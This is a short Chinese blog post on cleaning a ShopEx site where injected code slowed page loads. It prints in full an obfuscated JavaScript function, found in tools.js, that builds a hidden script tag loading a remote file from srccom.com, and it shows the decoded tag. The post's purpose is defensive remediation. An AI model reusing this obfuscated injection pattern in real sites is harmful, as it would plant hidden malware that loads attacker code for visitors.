shopex被挂马导致访问缓慢的解决办法
shopex网站速度缓慢,通过firefox浏览器跟踪网络请求,页面调用了一个地址http://srccom.com/SRC.SRC,
发现网站程序的/statics/script/tools.js里被嵌入了恶意函数
function CurrentXmlFrmFocus(){
var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5];
var arsOffset=[" ",":",".","/","<",">","=","'","CRS","MOC","TPIRCS","PTTH"];
var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9];
var strgAttribute=”";
ardPopOpacity=ardPopOpacity.concat(arnElement);
for(var i=0;i<ardPopOpacity.length;i++) strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]].split(“”).reverse().join(“”);
document.writeln(strgAttribute);
}
函数最终会拼接出一段完整的script标签
<script SRC=’http://srccom.com/SRC.SRC’></script>
解决办法
删除掉这串函数,或者使用shopex最新安装包中的文件上传替换它。
评论已关闭